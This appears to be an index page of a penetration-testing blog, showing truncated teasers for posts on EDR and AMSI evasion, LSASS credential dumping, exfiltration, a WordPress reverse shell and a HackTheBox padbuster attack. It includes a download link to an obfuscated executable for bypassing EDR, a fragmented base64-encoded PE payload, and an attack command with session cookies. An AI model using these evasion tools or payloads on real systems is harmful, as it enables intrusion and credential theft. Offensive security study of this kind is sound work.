A list of tools to bypass EDR using a variety of evasion techniques. PwnPowerShell GH - Signed - https://github.com/sp00ks-git/obfuscated-Encrypted-2023/raw/gh-pages/pjutvtn.exe.Signed.exe M...

WORDLISTS Suggested Wordlists download links (HTTP) - working as of 14/10/2019 (maybe out of date now but some should still be working) rockyou - https://github.com/brannondorsey/naive-hashcat...

Encrypted SPN Scanning and Cipher extraction whilst evading AntiVirus Usually SPN scanning involves using tools such as Rubeus. However as these are common and AV is looking for fingerprints of th...

A M S I ${01001011100110010} = [Convert]::FromBase64String("TV"+"qQAAM"+"AAAAEAAAA//8A"+"ALgAAAAAAAAAQAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAAAAAAAAAA"+"AAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncm...

It is less common than it used to be to find Windows 7 Operating systems in place, have they are still found across domains. Sometimes forbespoke applciatiosn or services that can’t be ported onto ...

It is common during engagements to find that CLM (Constrained Language Mode) is configured on PowerShell as a SafeGuard or control against malicous activity. This is a common misconception as there...

I recently had a situation during an engagement where i needed to demonstrate that data could be extracted from the organisation. I wanted to exfil data without going over the internet for security...

There are many, many ways to dump the LSASS process in order to gather credentials and other sensitive information from systems. Two ways I dump LSASS can be seen below. The first way is to invok...

Reverse Shell in Wordpress with WPForce and Yertle Imagine the scenario where you are presented with a WordPress site during a pentest and want to get in. Standard ‘author?’ requests don’t give y...

STEP 1 padbuster http://docker.hackthebox.eu:37742 zjtTgJyHOn9YxWLIJu%2BnoDGlL9vvl4RGVm44osvhYXxAkHGGKroFCA%3D%3D --cookies "PHPSESSID=7d5guetet0tj3o1kn8lrd77da0;iknowmag1k=zjtTgJyHOn9YxWLIJu%2BnoD...